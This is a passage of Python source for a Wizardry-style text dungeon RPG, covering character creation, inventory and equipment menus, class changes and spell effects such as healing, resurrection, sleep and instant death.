- # or l)eave\")\n if ch == 'l':\n break\n try:\n if 0 <= (chid := int(ch)-1) < len(game.party.members):\n del self.members[chid]\n game.vscr.disp_scrwin()\n except:\n pass\n\n\nclass Member:\n # Represents a character\n def __init__(self, name, align, race):\n self.name = name\n self.align = align\n self.race = race\n self.level = 1\n self.ac = 10\n self.acplus = 0 # valid only in battle\n self.job = Job.UNEMPLOYED\n self.state = State.OK\n self.silenced = False # valid only in battle\n self.poisoned = False\n self.inspected = False # valid only for inspecting chest\n self.deepest = 1 # deepest floor visited at least once\n self.floor = 0 # for defeated party member\n self.in_maze = False # for defeated party member\n self.gold = random.randrange(100, 200)\n self.exp = 0\n self.nextexp = 0\n self.marks = 0\n self.rip = 0\n self.items = [] # 0name, 1equipped, 2cursed, 3unidentified\n self.stat = [0, 0, 0, 0, 0, 0]\n self.stat[0], self.stat[1], self.stat[2], self.stat[3], self.stat[4], \\\n self.stat[5] = race_status[race]\n self.maxhp = 0\n self.hp = self.maxhp\n self.hpplus = 0 # -1 if poisoned, >0 if healing item\n self.mspells = []\n self.pspells = []\n self.mspell_cnt = [0, 0, 0, 0, 0, 0, 0]\n self.pspell_cnt = [0, 0, 0, 0, 0, 0, 0]\n self.mspell_max = [0, 0, 0, 0, 0, 0, 0]\n self.pspell_max = [0, 0, 0, 0, 0, 0, 0]\n\n def __repr__(self):\n return f\"<{self.name}, {self.align.name[:1]}-{self.race.name[:3]}-{self.job.name[:3]} {self.stat[0]}/{self.stat[1]}/{self.stat[2]}/{self.stat[3]}/{self.stat[4]}>\"\n\n def __str__(self):\n return f\"{self.name[:16].ljust(16)} Lv{self.level:3d} {self.race.name[:3].lower()}-{self.align.name[:1].lower()}-{self.job.name[:3].lower()}\"\n\n def disp_character(self, game):\n \"\"\"\n Display a character information in the message window\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n mw.mes_lines = []\n mw.print(\n f\"{self.name.ljust(16)} L{self.level:3d} {self.align.name[:1].lower()}-{self.job.name[:3].lower()} {self.race.name.lower()}\", start=' ')\n mw.print(f\"\", start=' ')\n mw.print(\n f\"strength {self.stat[0]:2d} gold {self.gold:16d} lvl {self.level:5d}\", start=' ')\n mw.print(\n f\" i.q. {self.stat[1]:2d} e.p. {self.exp:16d} rip {self.rip:5d}\", start=' ')\n mw.print(\n f\" piety {self.stat[2]:2d} next {self.nextexp:16d} a.c.{self.ac:5d}\", start=' ')\n mw.print(\n f\"vitality {self.stat[3]:2d} marks {self.marks:15d} depth{self.deepest:4d}\", start=' ')\n mw.print(\n f\" agility {self.stat[4]:2d} h.p. 
{self.hp:7d}/{self.maxhp:7d}\", start=' ')\n mw.print(\n f\" luck {self.stat[5]:2d} status {self.state.name}\", start=' ')\n mw.print(f\"\", start=' ')\n mw.print(f\"mage {self.mspell_cnt[0]}/{self.mspell_cnt[1]}/{self.mspell_cnt[2]}/{self.mspell_cnt[3]}/{self.mspell_cnt[4]}/{self.mspell_cnt[5]}/{self.mspell_cnt[6]} priest {self.pspell_cnt[0]}/{self.pspell_cnt[1]}/{self.pspell_cnt[2]}/{self.pspell_cnt[3]}/{self.pspell_cnt[4]}/{self.pspell_cnt[5]}/{self.pspell_cnt[6]}/\", start=' ')\n for idx in range(8):\n try:\n item = self.items[idx]\n m = ' '\n if self.job.name[:1].lower() not in \\\n game.itemdef[item[0]].jobs.lower():\n m = '#' # can't equip\n if item[1]:\n m = '*' # equipped\n if item[2]:\n m = '&' # cursed\n if self.items[idx][3]: # unidentified\n l = f\"{m}?{game.itemdef[item[0]].unident}\"\n else:\n l = f\"{m}{item[0]}\"\n except:\n l = ''\n if idx % 2:\n mw.print(f\"{idx}) {ol.ljust(18)} {idx+1}) {l.ljust(18)}\",\n start=' ')\n ol = l\n\n def inspect_character(self, game):\n \"\"\"\n Inspect a character\n Show the character info and dispatch item or spell menus\n \"\"\"\n mw = game.vscr.meswins[-1]\n while game.party.members:\n if game.party.floor_move and game.party.place == Place.CAMP:\n break\n self.disp_character(game)\n mw.print(f\"\", start=' ')\n c1 = mw.input_char(\"i)tems s)pells c)lass jk)change member l)leave\",\n values=['i', 's', 'c', 'j', 'k', 'l'])\n if c1 == 'l':\n mw.cls()\n return 0 # leave\n elif c1 == 'i':\n self.item_menu(game)\n elif c1 == 's':\n self.spell_menu(game)\n elif c1 == 'c' and game.party.place == Place.TRAINING_GROUNDS:\n self.change_classes(game)\n elif c1 == 'j':\n return 1 # next member\n elif c1 == 'k':\n return -1 # previous member\n return 0\n\n def view_spells(self, game):\n \"\"\"\n View mage and priest spell list that he/she has mastered\n \"\"\"\n v = game.vscr\n sw = Meswin(v, 1, 2, 76, 14)\n v.meswins.append(sw)\n d = game.spelldef\n lines = []\n if self.mspells:\n lines.append(\"Mage spells:\")\n for name in self.mspells:\n lines.append(\n f\"{d[name].level} {name.ljust(13)}{d[name].desc[:57]}\")\n lines.append(\"\")\n if self.pspells:\n lines.append(\"Priest spells:\")\n for name in self.pspells:\n lines.append(\n f\"{d[name].level} {name.ljust(13)}{d[name].desc[:57]}\")\n if len(lines) <= 14-1:\n for l in lines:\n sw.print(l, start=' ')\n sw.print(\"Press any key.\")\n v.disp_scrwin()\n getch()\n else:\n idx = 0\n while True:\n sw.cls()\n for l in lines[idx:idx+14-1]:\n sw.print(l, start=' ')\n sw.print(\"j)down k)up l)eave\")\n v.disp_scrwin()\n c = getch(wait=True)\n if c == 'j' and idx < len(lines)-14+1:\n idx += 1\n elif c == 'k' and idx > 0:\n idx -= 1\n elif c == 'l':\n break\n # sw.cls()\n v.disp_scrwin()\n v.meswins.pop()\n v.cls()\n\n def spell_menu(self, game):\n \"\"\"\n Spell menu. Cast, read spells.\n \"\"\"\n v = game.vscr\n mw = Meswin(v, 14, 4, 44, 12, frame=True)\n v.meswins.append(mw)\n while not game.party.floor_move or \\\n game.party.place not in \\\n [Place.MAZE, Place.CAMP, Place.BATTLE]: # if not tsubasa\n mw.print(\"Spell memu:\")\n c = mw.input_char(\"c)ast spell v)iew list l)eave\",\n values=['c', 'v', 'l'])\n if c == 'l':\n break\n elif c == 'c':\n if game.party.place in [Place.CAMP, Place.BATTLE]:\n game.spell.cast_spell(self)\n else:\n mw.print(\"Can't cast spell now.\")\n v.disp_scrwin()\n elif c == 'v':\n self.view_spells(game)\n # mw.cls()\n v.disp_scrwin()\n v.meswins.pop()\n v.cls()\n\n def item_menu(self, game):\n \"\"\"\n Item menu. 
Use, equip, trade, drop an item.\n \"\"\"\n vscr = game.vscr\n iw = Meswin(vscr, 14, 2, 44, 8, frame=True)\n vscr.meswins.append(iw)\n while True:\n iw.print(\"which item? # or l)leave\")\n vscr.disp_scrwin()\n c = getch()\n if c == 'l':\n vscr.meswins.pop()\n vscr.cls()\n return\n try:\n if (inum := int(c)-1) > len(self.items)-1:\n continue\n except:\n continue\n dispname = self.items[inum][0]\n if self.items[inum][3]: # unidentified\n dispname = ''.join(['?', game.itemdef[dispname].unident])\n iw.print(f\"{inum+1}) {dispname}\", start=' ')\n c = iw.input_char(\"u)se e)quip t)rade d)rop l)eave\",\n values=['u', 'e', 't', 'd', 'l'])\n if c == 'l':\n continue\n elif c == 'u':\n if self.items[inum][3]: # unidentified:\n iw.print(f\"Tried to use {dispname}.\")\n iw.print(\n \".. but don't know how to use it.\", start=' ')\n vscr.disp_scrwin()\n else:\n itemdef = game.itemdef[self.items[inum][0]]\n if not itemdef.use:\n iw.print(f\"Tried to use {dispname}.\")\n iw.print(\".. but wasn't able to.\", start=' ')\n vscr.disp_scrwin()\n elif itemdef.use == 'etc':\n iw.print(f\"Used {dispname}.\")\n vscr.disp_scrwin()\n if self.items[inum][0] == 'muramasa blade':\n self.stat[0] += 1 # str+1\n elif self.items[inum][0] == 'kaiser knuckles':\n self.maxhp += 1 # hp+1\n elif self.items[inum][0] == 'armor of lords':\n for m in game.party.members:\n m.hp = m.maxhp\n elif self.items[inum][0] == 'ninja dagger':\n self.job = Job.NINJA\n for i in self.items:\n i[1] = False\n if itemdef.brk > random.randrange(100):\n self.items[inum][0] = 'broken item'\n getch(wait=True)\n vscr.meswins.pop()\n vscr.cls()\n return\n else: # magic spell\n sdef = game.spelldef[itemdef.use]\n if not sdef.camp:\n iw.print(\"Can't use it now.\")\n if sdef.target == 'member':\n target = game.party.choose_character(\n game)\n if not target:\n #mw = game.vscr.meswins[-1]\n iw.print(\"Aborted.\", start=' ')\n continue\n else:\n target = sdef.target\n iw.print(f\"Used {dispname}.\")\n vscr.disp_scrwin()\n game.spell.cast_spell_dispatch(\n self, itemdef.use, target)\n if itemdef.brk > random.randrange(100):\n self.items[inum][0] = 'broken item'\n vscr.meswins.pop()\n vscr.cls()\n return\n elif c == 't':\n if self.items[inum][2]:\n iw.print(f\"Cursed.\")\n vscr.disp_scrwin()\n continue\n elif self.items[inum][1]:\n iw.print(f\"Equipped.\")\n vscr.disp_scrwin()\n continue\n target = game.party.choose_character(game)\n if target and len(target.items) < 8:\n target.items.append(self.items[inum])\n self.items.pop(inum)\n iw.print(f\"Gave to {target.name}.\")\n vscr.disp_scrwin()\n getch(wait=True)\n vscr.meswins.pop()\n vscr.cls()\n break\n elif c == 'd':\n if self.items[inum][2]:\n iw.print(f\"Cursed.\")\n vscr.disp_scrwin()\n continue\n elif self.items[inum][1]:\n iw.print(f\"Equipped.\")\n vscr.disp_scrwin()\n continue\n c = iw.input_char(f\"Drop {dispname}? 
(y/n)\",\n values=['y', 'n'])\n if c == 'y':\n self.items.pop(inum)\n iw.print(f\"Dropped {dispname}.\")\n vscr.disp_scrwin()\n vscr.meswins.pop()\n vscr.cls()\n break\n elif c == 'e':\n if self.job.name[:1] not in game.itemdef[self.items[inum][0]].jobs:\n iw.print(\"Can't equip the item.\")\n continue\n for item in self.items:\n if game.itemdef[self.items[inum][0]].type \\\n == game.itemdef[item[0]].type:\n if item[2]: # already cursed\n iw.print(\"Already equipped a cursed item.\")\n break\n elif item[1]: # equipped\n item[1] = False\n self.calc_ac(game)\n vscr.meswins.pop()\n vscr.cls()\n # vscr.disp_scrwin()\n return\n if game.itemdef[self.items[inum][0]].curse:\n self.items[inum][2] = True # cursed\n iw.print(\"Cursed!\")\n vscr.disp_scrwin()\n getch()\n self.items[inum][1] = True # equipped\n self.calc_ac(game)\n vscr.meswins.pop()\n vscr.cls()\n # vscr.disp_scrwin()\n return\n\n def calc_ac(self, game):\n \"\"\"\n Utility method to calculate AC\n \"\"\"\n self.ac = 10\n for item in self.items:\n if item[1] or item[2]:\n self.ac += game.itemdef[item[0]].ac\n\n def job_applicable(self, sp, jobnum):\n \"\"\"\n Utility function to check if the character is applicable for the job\n \"\"\"\n for i in range(6):\n if sp[i]+self.stat[i] < job_requirements[Job(jobnum)][i]:\n return False\n if job_requirements[Job(jobnum)][6][self.align.value]:\n return True\n else:\n return False\n\n def calc_bonus(self):\n \"\"\"\n Calculate bonus points (on creating a character)\n \"\"\"\n bonus = random.randrange(5, 10)\n for _ in range(3):\n if random.randrange(6) == 0:\n bonus += 10\n return bonus\n\n def bonus_disp(self, game, bonus, y, sp):\n \"\"\"\n Display bonus assignment screen\n \"\"\"\n vscr = game.vscr\n mw = vscr.meswins[-1]\n mw.cls()\n mw.print(\"Distribute bonus points -\")\n mw.print(\" h)minus j)down k)up l)plus\", start=' ')\n mw.print(\" .)change bonus x)done\", start=' ')\n mw.print(\"\", start=' ')\n mw.print(f\" strength {sp[0]+self.stat[0]:2d}\", start=' ')\n mw.print(f\" iq {sp[1]+self.stat[1]:2d}\", start=' ')\n mw.print(f\" piety {sp[2]+self.stat[2]:2d}\", start=' ')\n mw.print(f\" vitality {sp[3]+self.stat[3]:2d}\", start=' ')\n mw.print(f\" agility {sp[4]+self.stat[4]:2d}\", start=' ')\n mw.print(f\" luck {sp[5]+self.stat[5]:2d}\", start=' ')\n mw.print(f\"\\n bonus {bonus:2d}\", start=' ')\n mw.print(\"\", start=' ')\n mw.mes_lines[y+4] = mw.mes_lines[y+4][:13] + \\\n '>' + mw.mes_lines[y+4][14:]\n line = ''\n job = False\n for jobnum in range(8):\n if self.job_applicable(sp, jobnum):\n job = True\n line = ''.join([line, Job(jobnum).name[:].lower(), ' '])\n mw.print(line, start=' ')\n vscr.disp_scrwin()\n return job\n\n def change_classes(self, game):\n \"\"\"\n Change classes\n \"\"\"\n v = game.vscr\n mw = v.meswins[-1]\n statplus = [0, 0, 0, 0, 0, 0]\n jobs = [';']\n jobnames = ''\n line = ''\n for jobnum in range(8):\n if self.job_applicable(statplus, jobnum) and self.job != Job(jobnum):\n jobnames = ' '.join([jobnames, Job(jobnum).name.lower()])\n line = '/'.join([line, Job(jobnum).name[:1].lower()])\n jobs.append(Job(jobnum).name[:1].lower())\n line = line[1:] # remove the first '/'\n mw.print(f\"{self.name} can apply for:\")\n mw.print(f\" {jobnames}\")\n c = mw.input_char(f\"Which job to apply? ({line} or ;)leave)\")\n if c == ';' or mw.input_char(\"Are you sure? 
(y/n)\",\n values=['y', 'n']) != 'y':\n mw.print(\"Cancelled.\")\n v.disp_scrwin()\n return\n for jobnum in range(8):\n if c == Job(jobnum).name[:1].lower():\n break\n self.job = Job(jobnum)\n self.nextexp = level_table[Job(jobnum)][0]\n self.exp = 0\n self.level = 1\n for item in self.items:\n item[1] = item[2] = False\n self.calc_ac(game)\n for i in range(6):\n self.stat[i] = race_status[self.race][i]\n if self.job not in [Job.MAGE, Job.SAMURAI, Job.BISHOP]:\n for spell_level in range(7):\n mastered = sum([\n 1 for spell in game.spelldef\n if game.spelldef[spell].level == spell_level+1 and\n spell in self.mspells])\n self.mspell_max[spell_level] = mastered\n self.mspell_cnt[spell_level] = mastered\n if self.job not in [Job.PRIEST, Job.LORD, Job.BISHOP]:\n for spell_level in range(7):\n mastered = sum([\n 1 for spell in game.spelldef\n if game.spelldef[spell].level == spell_level+1 and\n spell in self.pspells])\n self.pspell_max[spell_level] = mastered\n self.pspell_cnt[spell_level] = mastered\n if self.job == Job.MAGE:\n self.mspells.append('onibi')\n self.mspells.append('shunmin')\n self.mspells = list(set(self.mspells))\n self.mspell_max[0] = self.mspell_cnt[0] = max(\n 2, self.mspell_max[0])\n elif self.job == Job.PRIEST:\n self.pspells.append('jiai')\n self.pspells.append('ikari')\n self.pspells = list(set(self.pspells))\n self.pspell_max[0] = self.pspell_cnt[0] = max(\n 2, self.pspell_max[0])\n mw.print(f\"{self.name} has become a novice {self.job.name.lower()}.\")\n v.disp_scrwin()\n\n def distribute_bonus(self, game):\n \"\"\"\n Bonus assignment and deciding class main routine\n \"\"\"\n v = game.vscr\n newwin = False\n mw = v.meswins[-1]\n if mw.height < 14: # if exisiting window is too narrow\n mw = Meswin(v, 13, 2, 55, 14, frame=True)\n v.meswins.append(mw)\n newwin = True\n bonus = self.calc_bonus()\n y = 0\n statplus = [0, 0, 0, 0, 0, 0]\n while True:\n job = self.bonus_disp(game, bonus, y, statplus)\n c = getch()\n if c == 'x' and bonus == 0 and job:\n break\n elif c == 'j' and y < 5:\n y += 1\n elif c == 'k' and y > 0:\n y -= 1\n elif c == 'h' and statplus[y] > 0:\n statplus[y] -= 1\n bonus += 1\n elif c == 'l' and statplus[y]+self.stat[y] < \\\n race_status[self.race][y]+10 and bonus > 0:\n statplus[y] += 1\n bonus -= 1\n elif c == '.':\n statplus = [0, 0, 0, 0, 0, 0]\n bonus = self.calc_bonus()\n jobs = []\n line = \"Choose class (\"\n for jobnum in range(8):\n if self.job_applicable(statplus, jobnum):\n line = ''.join([line, Job(jobnum).name[:1].lower(), '/'])\n jobs.append(Job(jobnum).name[:1].lower())\n line = ''.join([line[:-1], ')'])\n mw = game.vscr.meswins[-1]\n c = mw.input_char(line, values=jobs)\n for jobnum in range(8):\n if c == Job(jobnum).name[:1].lower():\n break\n self.job = Job(jobnum)\n self.nextexp = level_table[Job(jobnum)][0]\n if self.job == Job.FIGHTER:\n self.maxhp = self.hp = random.randint(8, 15)\n elif self.job == Job.MAGE:\n self.maxhp = self.hp = random.randint(2, 7)\n self.mspells = ['onibi', 'shunmin']\n self.mspell_max = [2, 0, 0, 0, 0, 0, 0]\n self.mspell_cnt = [2, 0, 0, 0, 0, 0, 0]\n elif self.job == Job.PRIEST:\n self.maxhp = self.hp = random.randint(6, 13)\n self.pspells = ['jiai', 'ikari']\n self.pspell_max = [2, 0, 0, 0, 0, 0, 0]\n self.pspell_cnt = [2, 0, 0, 0, 0, 0, 0]\n elif self.job == Job.THIEF or Job.BISHOP:\n self.maxhp = self.hp = random.randint(4, 9)\n elif self.job == Job.SAMURAI:\n self.maxhp = self.hp = random.randint(12, 19)\n elif self.job == Job.LORD:\n self.maxhp = self.hp = random.randint(12, 19)\n else: # ninja\n 
self.maxhp = self.jp = random.randint(8, 17)\n\n for i in range(6):\n self.stat[i] += statplus[i]\n game.characters.append(self)\n mw.print(\"Character created\")\n game.vscr.disp_scrwin()\n getch(wait=True)\n if newwin:\n v.meswins.pop()\n v.cls()\n\n\nclass Spell:\n \"\"\"\n Has actual spell implementation here\n \"\"\"\n\n def __init__(self, game):\n self.game = game\n\n def cancast(self, mem, spell, consume=False):\n \"\"\"\n Check if mem has mastered the spell and has MP\n Return True if can (and consumed if concume=True)\n Return False if can not\n \"\"\"\n if mem.state not in [State.OK]:\n return False\n spelldef = self.game.spelldef[spell]\n if spell in mem.mspells:\n if mem.mspell_cnt[spelldef.level-1] > 0:\n if consume:\n mem.mspell_cnt[spelldef.level-1] -= 1\n return True\n elif spell in mem.pspells:\n if mem.pspell_cnt[spelldef.level-1] > 0:\n if consume:\n mem.pspell_cnt[spelldef.level-1] -= 1\n return True\n return False\n\n def spell_counts(self, start, diff, level):\n \"\"\"\n Utility funciton to calculate spell counts.\n \"\"\"\n clist = []\n l = level - start\n clist.append(l)\n for _ in range(6):\n l = l - diff\n clist.append(min(max(l, 0), 9))\n return clist\n\n def cast_spell(self, mem):\n game = self.game\n v = game.vscr\n mw = v.meswins[-1]\n s = mw.input(\"What spell to cast?\")\n if s not in game.spelldef: # No such spell\n mw.print(\"What?\", start=' ')\n return\n elif s not in list(itertools.chain(mem.mspells, mem.pspells)):\n mw.print(\"Haven't mastered the spell.\", start=' ')\n return\n\n sdef = game.spelldef[s]\n if game.party.place == Place.BATTLE:\n if not sdef.battle:\n mw.print(\"Can't cast now.\", start=' ')\n return\n elif not sdef.camp: # note: you can use it at tavern, too.\n mw.print(\"Can't cast it now.\", start=' ')\n return\n\n if sdef.categ == 'mage':\n splcntlst = mem.mspell_cnt\n else:\n splcntlst = mem.pspell_cnt\n if splcntlst[sdef.level-1] <= 0:\n mw.print(\"MP exhausted.\", start=' ')\n return\n\n if sdef.target == 'member':\n target = self.game.party.choose_character(self.game)\n if not target:\n mw = self.game.vscr.meswins[-1]\n mw.print(\"Aborted.\", start=' ')\n return\n elif sdef.target in ['enemy', 'group']:\n gnum = self.game.battle.choose_group()\n target = self.game.battle.monp[gnum]\n else:\n target = sdef.target\n\n splcntlst[sdef.level-1] -= 1\n\n mw.print(f\"{mem.name} started casting {s}\", start=' ')\n v.disp_scrwin()\n self.cast_spell_dispatch(mem, s, target)\n\n def cast_spell_dispatch(self, invoker, spell, target):\n sdef = self.game.spelldef[spell]\n if sdef.type == 'heal':\n self.heal(invoker, spell, target)\n elif sdef.type in ['attack', 'death']:\n self.attack(invoker, spell, target)\n elif sdef.type == 'ac':\n self.ac(invoker, spell, target)\n elif sdef.type == 'status':\n self.status(invoker, spell, target)\n elif sdef.type == 'cure':\n self.cure(invoker, spell, target)\n else: # etc\n self.etc(invoker, spell, target)\n\n def cure(self, invoker, spell, target):\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = self.game.spelldef[spell]\n if spell == 'okiro':\n if target.state in [State.ASLEEP, State.PARALYZED]:\n target.state = State.OK\n mw.print(f\"{target.name} is awaken.\", start=' ')\n v.disp_scrwin()\n elif spell == 'gedoku':\n if target.poisoned:\n target.poisoned = False\n # target.hpplus += 1\n mw.print(f\"{target.name} is cured.\", start=' ')\n v.disp_scrwin()\n\n def etc(self, invoker, spell, target):\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = self.game.spelldef[spell]\n if spell == 
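The class-to-starting-HP chain in distribute_bonus() above is easy to get wrong in Python: `self.job == Job.THIEF or Job.BISHOP` evaluates as `(self.job == Job.THIEF) or bool(Job.BISHOP)`, and a non-empty enum member is always truthy. A table-driven sketch of the same HP dice (using a minimal stub of the Job enum, not dl.py's full one) sidesteps that pitfall:

```python
import random
from enum import Enum

class Job(Enum):   # minimal stub of dl.py's Job enum for this sketch
    FIGHTER, MAGE, PRIEST, THIEF, BISHOP, SAMURAI, LORD, NINJA = range(8)

# Starting-HP dice per class, mirroring the ranges in distribute_bonus().
HP_DICE = {
    Job.FIGHTER: (8, 15), Job.MAGE: (2, 7), Job.PRIEST: (6, 13),
    Job.THIEF: (4, 9), Job.BISHOP: (4, 9), Job.SAMURAI: (12, 19),
    Job.LORD: (12, 19), Job.NINJA: (8, 17),
}

def starting_hp(job):
    lo, hi = HP_DICE[job]
    return random.randint(lo, hi)

print(starting_hp(Job.BISHOP))   # always 4-9, never the fighter range
```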
'gps':\n self.game.party.gps = True\n elif spell == 'tsubasa':\n party = self.game.party\n fl = mw.input(f\"To which floor? (1-{invoker.deepest})\")\n try:\n fl = int(fl)\n if 0 < fl <= invoker.deepest:\n party.floor_move = 3 # tsubasa; on the upstairs\n party.tsubasa_floor = fl\n return\n except:\n pass\n mw.print(\"What?\")\n v.disp_scrwin()\n elif spell == 'shikibetsu':\n self.game.party.identify = True\n elif spell == 'hogo':\n self.game.party.ac = int(spelldef.value)\n elif spell == 'akari':\n self.game.party.light_cnt += random.randrange(15) + 30\n elif spell == 'hikarinotama':\n self.game.party.light_cnt += 9999\n elif spell == 'kanzen':\n if target.state not in {State.DEAD, State.ASHED, State.LOST}:\n target.hp = target.maxhp\n target.state = State.OK\n if target.poisoned:\n target.poisoned = False\n # target.hpplus += 1\n mw.print(f\"{target.name} is completely healed.\", start=' ')\n elif spell == 'senmetsu':\n monptmp = self.game.battle.monp[:]\n for mong in monptmp:\n mondef = self.game.mondef[mong.name]\n if mong.identified:\n dispname = mondef.names\n else:\n dispname = mondef.unidents\n if mondef.weakmaka:\n self.game.battle.exp += len(mong.monsters) * \\\n mondef.exp\n monsterg = mong.monsters\n for mon in monsterg:\n mon.state = State.DEAD\n # mong.monsters.remove(mon)\n mw.print(f\"{dispname} are perished.\", start=' ')\n # self.game.battle.monp.remove(mong)\n v.disp_scrwin()\n elif spell == 'hinshi':\n if isinstance(invoker, Member):\n mondef = self.game.mondef[target.name]\n if target.identified:\n disptarget = target.name\n else:\n disptarget = mondef.unident\n if random.randrange(100) >= mondef.regspellp:\n damage = max(\n target.monsters[0].hp - random.randrange(7) - 1, 0)\n target.monsters[0].hp -= damage\n mw.print(\n f\"{disptarget} incurred {damage} damage.\", start=' ')\n else:\n mw.print(f\"{disptarget} registed the spell.\", start=' ')\n else:\n target = random.choice([mem for mem in self.game.party.members\n if mem.state in [State.OK, State.ASLEEP]])\n regspellp = target.stat[5] * 100/20 # luck\n if random.randrange(100) >= regspellp:\n damage = max(target.hp - random.randint(7) - 1, 0)\n target.hp -= damage\n mw.print(\n f\"{target.name} incurred {damage} damage.\", start=' ')\n else:\n mw.print(f\"{target.name} registed the spell.\", start=' ')\n elif spell == 'sosei': # party member only\n if target.state != State.DEAD:\n mw.print(f\"{target.name} is not dead.\", start=' ')\n else:\n chance = (target.stat[3]+target.stat[5]) * 100//45\n if random.randrange(100) < chance:\n mw.print(f\"{target.name} is resurrected.\", start=' ')\n target.stat[3] -= 1\n target.state = State.OK\n target.hp = min(target.maxhp, random.randrange(7)+1)\n else:\n mw.print(f\"Failed to resurrect {target.name}.\", start=' ')\n target.state = State.ASHED\n elif spell == 'fukkatsu':\n if target.state not in [State.DEAD, State.ASHED]:\n mw.print(f\"{target.name} is not dead or ashed.\", start=' ')\n else:\n chance = (target.stat[3]+target.stat[5]) * 100//40\n if random.randrange(100) < chance:\n mw.print(f\"{target.name} is resurrected.\", start=' ')\n target.stat[3] -= 1\n target.state = State.OK\n target.hp = target.maxhp\n else:\n mw.print(f\"Failed to resurrect {target.name}.\", start=' ')\n if target.state == State.DEAD:\n target.state = State.ASHED\n else: # was ashed\n target.state = State.LOST\n\n def ac(self, invoker, spell, target):\n \"\"\"\n Decrease peer(s)' or increase opponent(s)' AC\n \"\"\"\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = 
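cast_spell_dispatch() above routes a spell to a handler by its type string through an if/elif chain. The same routing can be expressed as a lookup table with etc() as the fallback; a self-contained sketch with dummy handlers:

```python
def heal(invoker, spell, target):
    print("heal:", spell)

def attack(invoker, spell, target):
    print("attack:", spell)

def etc(invoker, spell, target):
    print("etc:", spell)

# 'death' spells share the attack handler, as in cast_spell_dispatch().
HANDLERS = {'heal': heal, 'attack': attack, 'death': attack}

def dispatch(spell_type, invoker, spell, target):
    HANDLERS.get(spell_type, etc)(invoker, spell, target)

dispatch('heal', None, 'jiai', None)    # -> heal: jiai
dispatch('light', None, 'akari', None)  # -> etc: akari
```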
self.game.spelldef[spell]\n if spelldef.target == 'self':\n if isinstance(invoker, Member):\n invoker.acplus += int(spelldef.value)\n else:\n invoker.ac += int(spelldef.value)\n elif spelldef.target == 'party':\n if isinstance(invoker, Member):\n for m in self.game.party.members:\n m.acplus += int(spelldef.value)\n else:\n for m in self.game.battle.monp[0].monsters:\n m.ac += int(spelldef.value)\n elif spelldef.target == 'enemy':\n if isinstance(invoker, Member):\n target.monsters[0].ac += int(spelldef.value)\n else:\n mem = random.choice(self.game.party.members)\n mem.ac += int(spelldef.value)\n elif spelldef.target == 'group':\n if isinstance(invoker, Member):\n for mon in target.monsters:\n mon.ac += int(spelldef.value)\n else:\n for mem in self.game.party.members:\n mem.ac += int(spelldef.value)\n else: # 'all'\n if isinstance(invoker, Member):\n for mong in self.game.battle.monp:\n for mon in mong:\n mon.ac += int(spelldef.value)\n else:\n for mem in self.game.party.members:\n mem.ac += int(spelldef.value)\n\n def status(self, invoker, spell, target):\n \"\"\"\n Spells that could put to sleep and silence the target group.\n \"\"\"\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = self.game.spelldef[spell]\n if isinstance(invoker, Member):\n if target.identified:\n disptarget = target.name\n else: # unidentified\n disptarget = self.game.mondef[target.name].unident\n for mon in target.monsters:\n if 'sleep' in spelldef.attr and mon.state == State.OK:\n if mon.mdef.weaksleep:\n chance = 80\n else:\n chance = 35\n if random.randrange(100) < chance and \\\n random.randrange(100) >= mon.mdef.regspellp:\n mon.state = State.ASLEEP\n if mon.state == State.ASLEEP:\n mw.print(f\"{disptarget} is slept.\", start=' ')\n else:\n mw.print(f\"{disptarget} is not slept.\", start=' ')\n if 'silence' in spelldef.attr:\n chance = 50 * mon.mdef.regspellp // 100\n if random.randrange(100) < chance or mon.silenced:\n mon.silenced = True\n mw.print(f\"{disptarget} is silenced.\", start=' ')\n else:\n mw.print(f\"{disptarget} is not silenced.\", start=' ')\n else:\n for mem in self.game.party.members:\n if 'sleep' in spelldef.attr and mem.state == State.OK:\n if random.randrange(100) < 35:\n mem.state = State.ASLEEP\n if mem.state == State.ASLEEP:\n mw.print(f\"{mem.name} is slept.\", start=' ')\n else:\n mw.print(f\"{mem.name} is not slept.\", start=' ')\n if 'slience' in spelldef.attr and \\\n (mem.mspells or mem.pspells):\n if random.randrange(100) < 50:\n mem.silenced = True\n if mem.silenced:\n mw.print(f\"{mem.name} is slept.\", start=' ')\n else:\n mw.print(f\"{mem.name} is not slept.\", start=' ')\n\n def death_single(self, target, disptarget):\n mw = self.game.vscr.meswins[-1]\n if isinstance(target, Monster):\n regdeathp = self.game.mondef[target.name].regdeathp\n else:\n # vitality + luck\n regdeathp = (target.stat[3] + target.stat[5]) * 100//40\n if random.randrange(100) >= regdeathp:\n mw.print(f\"{disptarget} is killed.\", start=' ')\n target.hp = 0\n target.state = State.DEAD\n else:\n mw.print(f\"{disptarget} is alive.\", start=' ')\n\n def attack(self, invoker, spell, target):\n v = self.game.vscr\n mw = v.meswins[-1]\n spelldef = self.game.spelldef[spell]\n if not isinstance(invoker, Member):\n if spelldef.target == 'enemy':\n mem = random.choice(self.game.party.members)\n if spelldef.type == 'death':\n death_single(mem, mem.name)\n else:\n damage = dice(spelldef.value)\n mw.print(\n f\"{mem.name} incurred {damage} damage.\", start=' ')\n v.disp_scrwin()\n mem.hp = max(0, mem.hp - 
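The spell code above leans on one recurring probability idiom: compare random.randrange(100) against a percentage, where the percentage itself often comes from stats (for sosei's resurrection roll, (vitality + luck) * 100 // 45). A worked example of that roll:

```python
import random

def chance(pct):
    # The recurring dl.py idiom: succeed with pct% probability.
    return random.randrange(100) < pct

# sosei's resurrection roll from the code above: a character with
# vitality 10 and luck 8 revives with (10 + 8) * 100 // 45 = 40%.
vit, luck = 10, 8
pct = (vit + luck) * 100 // 45
print(pct, chance(pct))
```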
